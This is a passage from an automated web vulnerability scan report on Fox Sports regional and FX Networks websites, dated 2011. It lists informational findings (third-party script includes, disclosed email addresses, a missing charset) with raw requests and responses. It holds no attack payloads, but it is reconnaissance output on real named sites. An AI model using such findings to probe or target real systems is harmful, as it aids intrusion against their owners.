Set-Cookie: PHPSESSID=52ba63048e530107d21cb80ac654b510; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 58751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
</script>-->

<script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/foxwest/common/appjs/~1294822698/s=main~thePlatform^swfobject/menz=1" type="text/javascript"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script>
<!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script>
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.west/landing_witz;tile=3;sz=728x90;ord=1294849871?" type="text/javascript">
</script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.west/landing_witz;tile=3;sz=300x250;ord=1294849871?" type="text/javascript">
</script>
...[SNIP]...
<!-- SiteCatalyst code version: H.17..
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com -->
<script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/foxwest/common/js/omniture/s_code_analytics_fsn.js"></script>
...[SNIP]...

6.25. http://www.foxsportswisconsin.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxsportswisconsin.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.foxsportswisconsin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:31:16 GMT
Server: Apache
Set-Cookie: PHPSESSID=b346a6944b6aa67934f8452ef87105ed; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 74886

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
</script>-->

<script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/fsswisc/common/appjs/~1294848286/s=main~thePlatform^swfobject~thePlatform^util~thePlatform^qos~thePlatform^qos_mps~ugc~flicker/menz=1" type="text/javascript"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script>
<!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script>
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<div id = "main_187">
<script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.wisconsin/main;tile=3;sz=300x250;ord=1294849878?" type="text/javascript">
</script>
...[SNIP]...
<!-- SiteCatalyst code version: H.17..
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com -->
<script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/fsswisc/common/js/omniture/s_code_analytics_fsn.js"></script>
...[SNIP]...

6.26. http://www.fxnetworks.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fxnetworks.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.fxnetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
Expires: Wed, 12 Jan 2011 16:31:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 16:31:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<div id="mnPlayer">
                                   <script type="text/javascript" src="http://admin.brightcove.com/js/APIModules_all.js"></script>
                                   <script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<div class="ad" style="margin-left:10px; float: left;">
<script src="http://1c6e2.v.fwmrm.net/ad/g/1?nw=116450&pvrn=1294849882&csid=FX_home&resp=ad;;ptgt=s&envp=g_js&slid=300x250slot&w=300&h=250" language="javascript"></script>
...[SNIP]...
<li class="last on_fx_networks">
                       <script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v53.js"></script>
...[SNIP]...

7. Email addresses disclosed  previous  next
There are 3 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


7.1. http://www.foxsportshouston.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxsportshouston.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.foxsportshouston.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:30:56 GMT
Server: Apache
Set-Cookie: PHPSESSID=d3f0a37aad79eca82e7871d6bfdcad10; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 69986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<a href="javascript:void(window.open('mailto:foxsportshouston@yahoo.com'));">
...[SNIP]...

7.2. http://www.foxsportsohio.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxsportsohio.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.foxsportsohio.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:31:02 GMT
Server: Apache
Set-Cookie: PHPSESSID=090a220f00fee006a09844523813c3f9; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 78763

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<a href="javascript:void(window.open('mailto:contactus-fso@foxsports.net'));">
...[SNIP]...

7.3. http://www.fxnetworks.com/  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fxnetworks.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.fxnetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
Expires: Wed, 12 Jan 2011 16:31:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 16:31:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<a href="mailto:user@fxnetworks.com">
...[SNIP]...

8. HTML does not specify charset  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxsportswest.com
Path:   /

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

Request

GET / HTTP/1.1
Host: www.foxsportswest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:31:11 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 56
Connection: close
Content-Type: text/html

<meta http-equiv="refresh" content="0;url=/pages/main">

Report generated by CloudScan Vulnerability Crawler at Wed Jan 12 10:37:26 CST 2011.